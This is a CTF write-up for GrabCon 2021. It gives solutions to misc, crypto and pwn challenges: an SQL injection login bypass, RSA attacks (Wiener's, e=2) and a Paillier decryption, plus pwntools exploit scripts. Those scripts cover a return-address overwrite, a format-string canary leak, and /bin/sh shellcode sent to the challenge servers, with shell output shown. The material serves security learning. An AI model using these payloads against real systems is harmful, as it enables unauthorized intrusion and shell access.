# GrabCon 21 - CTF Community
# Misc
```
Welcome
50
GrabCON{welcome_to_grabcon_2021}
```
## Eazy-Peazy
```
E4sy Pe4sy
100
Hack admin user!
Link
Author: r3curs1v3_pr0xy
```
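The form (presumably the login form) is vulnerable to SQL injection, and the input below was enough to get in as the admin user:

`' or 1=1;# '`

The leading quote closes the string literal in the query, `or 1=1` makes the condition always true, and `#` comments out the rest of the statement. This only works because the input is concatenated into the SQL text; a parameterized query would treat the whole input as data.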
**GrabCON{E4sy_pe4sy_SQL_1nj3ct10n}**
# Crypto
## Warm-up
```
Warm-up
50
Mukesh used to drink and then smoke 5 times a day. He is now suffering form cancer his drink was 64 rupees and 32 rupees cigarette that costs to cheap for him. And he has this much of cancer now.
Author: Offen5ive
```
```
https://gchq.github.io/CyberChef/#recipe=From_Base64('A-Za-z0-9%2B/%3D',true)From_Base32('A-Z2-7%3D',true)From_Base64('A-Za-z0-9%2B/%3D',true)From_Base32('A-Z2-7%3D',true)From_Base64('A-Za-z0-9%2B/%3D',true)From_Base32('A-Z2-7%3D',true)From_Base64('A-Za-z0-9%2B/%3D',true)From_Base32('A-Z2-7%3D',true)From_Base64('A-Za-z0-9%2B/%3D',true)From_Base32('A-Z2-7%3D',true)&input=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
```
GrabCON{dayuum_s0n!}
## Pokeball RSA
```
Poke Ball RSA
100
Eevee is in trouble. Help him as he tries to evolve into Sylveon in the Real Stormy Arena.
Author: RDxR10
```
```
n = 498934084350094415783044823223130007435556803301613073259727203199325937230080661117917023582579699673759861892703348357714077684549303787581429366922208568924252052118455313229534699860304480039147103608782140303489222166267907007839021544433148286217133494762766492655602977085105487216032806292874190551319
e = 134901827939710543990222584187396847806193644190423846456160711527109836908087675183249532946675670587286594441908191054495871501233678465783530503352727362726294270065122447852357566161748618195216611965946646411519602447104878893524856862722902833460104389620397589021732407447981724307130484482495521398799
c = 100132888193232309251839777842498074992587507373917163874335385921940537055226546911990198769720313749286675018486390873216490470403470144298153410686092752282228631590006943913867497072931343354481759219425807850047083814816718302223434388744485547550941814186146959750515114700335721173624212499886218608818
```
```
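# Pokeball RSA, stage 1: recover the private exponent d from the public key.
#
# E is about as large as N, which usually means d was chosen first and is
# small. For d below roughly N**0.25 / 3, the fraction k/d shows up among the
# continued-fraction convergents of E/N (Wiener's attack), so the denominator
# of each convergent is tried as a candidate d.
# Defensive takeaway: never pick a small private exponent; generate keys with
# a standard library and a fixed public exponent such as 65537.
#
# RSA key API reference:
# https://pycryptodome.readthedocs.io/en/latest/src/public_key/rsa.html
from Crypto.PublicKey import RSA
from sympy.core import Rational
from sympy.ntheory.continued_fraction import continued_fraction_convergents
from sympy.ntheory.continued_fraction import continued_fraction_iterator

N = 498934084350094415783044823223130007435556803301613073259727203199325937230080661117917023582579699673759861892703348357714077684549303787581429366922208568924252052118455313229534699860304480039147103608782140303489222166267907007839021544433148286217133494762766492655602977085105487216032806292874190551319
E = 134901827939710543990222584187396847806193644190423846456160711527109836908087675183249532946675670587286594441908191054495871501233678465783530503352727362726294270065122447852357566161748618195216611965946646411519602447104878893524856862722902833460104389620397589021732407447981724307130484482495521398799
c = 100132888193232309251839777842498074992587507373917163874335385921940537055226546911990198769720313749286675018486390873216490470403470144298153410686092752282228631590006943913867497072931343354481759219425807850047083814816718302223434388744485547550941814186146959750515114700335721173624212499886218608818
print((E, N))

convergents = continued_fraction_convergents(
    continued_fraction_iterator(Rational(E, N))
)

d = None
# zip() ends the loop cleanly if the expansion stops before 1000 convergents.
for _, frac in zip(range(1000), convergents):
    # Integer convergents print without "/" and carry no candidate denominator.
    if "/" not in str(frac):
        continue
    candidate = int(str(frac).split("/")[1])
    print(".", sep="", end="", flush=True)
    try:
        # construct() rejects an (N, E, d) triple that does not form a
        # consistent key; that rejection is what singles out the right d.
        RSA.construct((N, E, candidate))
    except Exception:
        # Best effort: any rejection just means "try the next convergent".
        continue
    d = candidate
    print("================")
    print(d)
    break

if d is None:
    # Without this guard the decryption below would run with a wrong exponent.
    raise SystemExit("no convergent of E/N yielded a valid private exponent")

m = pow(c, d, N)
print(hex(m))
# int.to_bytes avoids the odd-length failure of unhexlify(hex(m)[2:]).
print(m.to_bytes((m.bit_length() + 7) // 8, "big"))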
```
```
b'e=2,c=9019127052844164572606928250741960583163943438936945828390420331200602392329'
```
```
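# Pokeball RSA, stage 2: the first stage decrypts to "e=2,c=<number>".
# With e = 2 and no padding, a ciphertext that is a perfect square is simply
# m**2 computed without any modular reduction, so the integer square root
# returns the message directly. Randomised padding that fills the modulus
# (for example OAEP) is what prevents this.
import math

e = 2
ct = 9019127052844164572606928250741960583163943438936945828390420331200602392329

# math.isqrt is exact for arbitrarily large integers, so no third-party
# big-number package is needed for the e = 2 case.
root = math.isqrt(ct)
if root * root != ct:
    print("warning: ct is not a perfect square; the bytes below come from the floor of the root")

# int.to_bytes avoids the odd-length failure of unhexlify(hex(root)[2:]).
plaintext = root.to_bytes((root.bit_length() + 7) // 8, "big")
print(plaintext)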
```
## Not RSA - First Blood
```
Not RSA
440
Whatever it is, it's not RSA.
Author: RDxR10
```
![](https://i.imgur.com/wUr2g9u.png)
```
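# "Not RSA": the commented-out encryption below is the Paillier cryptosystem
# with n = a - 1, generator g = n + 1 = a and a random blinding value b:
#     c = g**m * b**n  mod n**2
# The published N is n**2. Decryption needs the factors p and q of n; the
# write-up lists them without showing how they were obtained. n is only about
# 256 bits, far below the modulus sizes used for factoring-based schemes.
N = 2433984714450860961589027518159810370561856716063956157321856705975948489337570445957833120668443867975490363019335530343179129689501017626817947777263721
c = 1378297008929492435762470180953416238081302819750327089183697281160938504327642742017058360280755400054663296904328307673692314945545918393502459480987913

# Challenge side, kept for reference only (not needed to decrypt). The
# original computed a with a floating-point sqrt, which is lossy at this size.
# a = isqrt(N) + 1
# b = random.randint(0, 9999999999)
# flag = b"REDACTED"
# m = bytes_to_long(flag)
# c = ((a**m)*(b**(a-1)))%((a-1)*(a-1))

p = 194545307101606186694882845905355574989
q = 253593527157826835431576067999755840801
n = p * q
if n * n != N:
    # Everything below assumes N == (p*q)**2; fail loudly if the inputs differ.
    raise SystemExit("p * q does not match the square root of N")

# Strip the blinding factor: r = c^(n^-1 mod phi(n)) mod n satisfies
# r**n == c (mod n), i.e. r is b reduced mod n.
r = pow(c, pow(n, -1, (p - 1) * (q - 1)), n)
# c * r**-n == (1 + n)**m == 1 + m*n (mod n**2), so m falls out by division.
m = ((c * pow(r, -n, N) - 1) % N) // n

print(hex(m))
plaintext = m.to_bytes((m.bit_length() + 7) // 8, "big")
print(plaintext)
# GrabCON{i75_p4ill13r_f0lks}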
```
**GrabCON{i75_p4ill13r_f0lks}**
## Old Monk's Password
```
Old Monk's Password
150
Monk: What's this man? One password, different encoded forms?
Author: RDxR10
```
```
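import codecs
import random

# The three ciphertexts handed out with the challenge: the same password
# encoded with three different starting offsets into the key.
enc = b'\x0cYUV\x02\x13\x16\x1a\x01\x04\x05C\x00\twcx|z(((%.)=K%(>'
enc1 = b'\x0bPPS\r\x0b\x02\x0f\x12\r\x03_G\t\x08yb}v+--*+*8=W,>'
enc2 = b'\x07A[\x06\\\r\x15\t\x04\x07\x18VG]U]@\x02\x08&9&%\' 41".;'


class pass_w:
    """Challenge-side encoder: XOR against a fixed key from a start offset.

    The key is embedded in the program and the start offset is written as the
    first output character, so the scheme gives no confidentiality to anyone
    who has the source.
    """

    x = "hjlgyjgyj10hadanvbwdmkw00OUONBADANKHM;IMMBMZCNihaillm"

    def encode(self, text, i=-1):
        """Return ``text`` XOR-ed with the key, prefixed by the start offset.

        ``i`` is the start offset into the key; an out-of-range value is
        replaced by a random one. The result is the UTF-8 encoding of the
        offset character followed by the XOR-ed characters.
        """
        # NOTE: the bounds (len + 1) and the wrap at 79 are kept exactly as in
        # the challenge source. The key is shorter than 79 characters, so an
        # offset that reaches the end of the key raises IndexError instead of
        # wrapping.
        if i < 0 or i > len(self.x) + 1:
            i = random.randint(0, len(self.x) + 1)
        out = chr(i)
        for c in text:
            out += chr(ord(c) ^ ord(self.x[i]))
            i = (i + 1) % 79
        return codecs.encode(out)


# y = pass_w()
# print(y.encode("REDACTED"))
# Enclose password within GrabCON{}


def decode(enc):
    """Invert ``pass_w.encode`` and return the recovered text.

    ``enc`` is the bytes object produced by the encoder: the first byte is the
    start offset into the key, the remaining bytes are the XOR-ed characters.
    The offset is printed as a progress aid, as in the original script.
    """
    key = pass_w.x
    i = enc[0]
    print(i)
    out = ""
    for c in enc[1:]:
        out += chr(c ^ ord(key[i]))
        # Same wrap value as the encoder so both sides stay in step.
        i = (i + 1) % 79
    # Returning the text (the original only printed it) makes the
    # print(decode(...)) call below show the password instead of None.
    return out


print(decode(enc))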
```
**GrabCON{817letmein40986728ilikeapples}**
# Pwn
## Easy bin
```
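from pwn import *

# Load the target binary so symbol addresses can be read from it.
proc = ELF("./easybin")
print(proc.symbols)

# Why a fixed payload works here (see the checksec lines and the symbol table
# in this script's output): the binary imports gets(), has no stack canary and
# is not PIE, which is consistent with an over-long input line overwriting the
# saved return address with a constant, known address.
# Defensive takeaway: a bounded read (fgets), -fstack-protector and PIE each
# break this pattern.
magie = p64(proc.symbols["vuln"])

for i in range(56, 57):
    # i is the padding length placed in front of the overwritten address.
    print(i)
    pl = b"a" * i + magie
    print(pl)

    # Dry run against a local copy of the binary first.
    try:
        local = process("./easybin")
        local.sendline(pl)
        local.interactive()
        local.close()
    except Exception:
        # Best effort: a failed local run must not stop the script.
        # (A bare "except:" would also swallow Ctrl-C.)
        pass

exploit = True
if exploit:
    # Same payload against the CTF service.
    conn = remote('35.205.161.145', '49153')
    conn.sendline(pl)
    conn.interactive()
    conn.close()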
```
```
[*] '/home/kali/Desktop/grabcon/pwn/easybin'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX disabled
PIE: No PIE (0x400000)
RWX: Has RWX segments
{'__abi_tag': 4195228, 'deregister_tm_clones': 4198560, 'register_tm_clones': 4198608, '__do_global_dtors_aux': 4198672, 'completed.0': 4210752, '__do_global_dtors_aux_fini_array_entry': 4210184, 'frame_dummy': 4198720, '__frame_dummy_init_array_entry': 4210176, '__FRAME_END__': 4202884, '__init_array_end': 4210184, '_DYNAMIC': 4210192, '__init_array_start': 4210176, '__GNU_EH_FRAME_HDR': 4202552, '_GLOBAL_OFFSET_TABLE_': 4210688, '__libc_csu_fini': 4198928, 'data_start': 4210736, 'vuln': 4198726, '_edata': 4210752, '_fini': 4198936, '__data_start': 4210736, '__dso_handle': 4210744, '_IO_stdin_used': 4202496, '__libc_csu_init': 4198816, '_end': 4210760, '_dl_relocate_static_pie': 4198544, '_start': 4198496, '__bss_start': 4210752, 'main': 4198762, '__TMC_END__': 4210752, '_init': 4198400, 'printf': 4198448, 'plt.printf': 4198448, 'execve': 4198464, 'plt.execve': 4198464, 'gets': 4198480, 'plt.gets': 4198480, '_ITM_deregisterTMCloneTable': 4210656, 'got._ITM_deregisterTMCloneTable': 4210656, '__libc_start_main': 4210664, 'got.__libc_start_main': 4210664, '__gmon_start__': 4210672, 'got.__gmon_start__': 4210672, '_ITM_registerTMCloneTable': 4210680, 'got._ITM_registerTMCloneTable': 4210680, 'got.printf': 4210712, 'got.execve': 4210720, 'got.gets': 4210728}
56
b'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaF\x11@\x00\x00\x00\x00\x00'
[+] Starting local process './easybin': pid 37201
[*] Switching to interactive mode
$ exit
[*] Got EOF while reading in interactive
$ quit
[*] Process './easybin' stopped with exit code 0 (pid 37201)
[*] Got EOF while sending in interactive
[+] Opening connection to 35.205.161.145 on port 49153: Done
[*] Switching to interactive mode
$ ls
easybin
flag.txt
run.sh
ynetd
$ cat flag.txt
GrabCON{w3ll_Y0u_Kn0w_Basics!!!}
```
## Can you ?
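Approach: leak the stack canary through the format-string output, then include the leaked value in the overflow so that the canary check still passes.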
```
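from pwn import *
import time

# Load the target binary so symbol addresses can be read from it.
proc = ELF("./cancancan")
print(proc.symbols)

# Address of win(), packed as a 32-bit word.
magie = p32(proc.symbols["win"])

# The service apparently passes user input to a printf-style function as the
# format string: the reply to "%31$x" is parsed below as the canary value.
# A stack canary only protects while its value stays secret, so the leak
# defeats it.
# Defensive takeaway: never use untrusted input as a format string
# (printf("%s", buf), -Wformat-security) and keep the read bounded.
for i in range(25, 26):
    # i is the number of 4-byte filler words placed in front of the canary.
    print(i)

    # Dry run against a local copy of the binary first.
    try:
        local = process("./cancancan")
        local.sendline(b"%31$x")
        canary = int(b"0x" + local.recv(1024).split(b"\n")[1], 16)
        pl = b"aaaa" * i + p32(canary) + magie * 4
        local.sendline(pl)
        local.interactive()
        local.close()
    except Exception:
        # Best effort: a failed local run must not stop the script.
        # (A bare "except:" would also swallow Ctrl-C.)
        pass

    exploit = True
    if exploit:
        # Same two-step exchange against the CTF service.
        conn = remote('35.246.42.94', '31337')
        conn.sendline(b"%31$x")
        # Give the service time to answer before reading the leaked value.
        time.sleep(1)
        canary = int(b"0x" + conn.recv(1024).split(b"\n")[1], 16)
        print(canary)
        pl = b"aaaa" * i + p32(canary) + magie * 4
        conn.sendline(pl)
        conn.interactive()
        conn.close()

# GrabCON{Byp4ss_can4ry_1s_fun!}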
```
**GrabCON{Byp4ss_can4ry_1s_fun!}**
## Pwn CTF
Shellcode on the stack: the service prints a stack address, which the script parses and uses as the new return address.
```
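from pwn import *
import time

# The service's banner contains a stack address (parsed into `stack` below).
# Combined with an unchecked copy and a stack that is presumably executable,
# that disclosure is what makes the overwritten return address predictable.
# Defensive takeaway: non-executable stack (NX), stack canaries, bounded
# reads, and never printing addresses to the client.
for i in range(302, 303):
    # i is the padding length placed in front of the overwritten address.
    print(i)
    conn = remote("35.246.42.94", "1337")  # local testing: process("./pwn2")
    # Wait for the banner that carries the address.
    time.sleep(2)
    stack = int(conn.recv().split(b"\n")[1].split(b" ")[2][:-1], 16)
    print(hex(stack))
    # Payload bytes are reproduced unchanged from the original listing.
    pl = b"\x90" * i + p32(stack) + b"\x90" * 100 + b"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80"
    conn.sendline(pl)
    time.sleep(1)
    try:
        conn.interactive()
    except Exception:
        # Best effort, as in the original: an error in the interactive
        # session is ignored.
        pass
    finally:
        # Close exactly once, whether or not the session raised.
        conn.close()
    input()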
```
```
kali@kali:~/Desktop/grabcon/pwn$ python3 blacklisted.py
302
[+] Opening connection to 35.246.42.94 on port 1337: Done
0xffe7d4be
[*] Switching to interactive mode
$
$ ls
bin
dev
flag.txt
lib
lib32
lib64
pwn2
$ cat flag.txt
GrabCON{Y0U_g0t_Sh3ll_B4asics}
$
```
**GrabCON{Y0U_g0t_Sh3ll_B4asics}**
That's all folks - Electro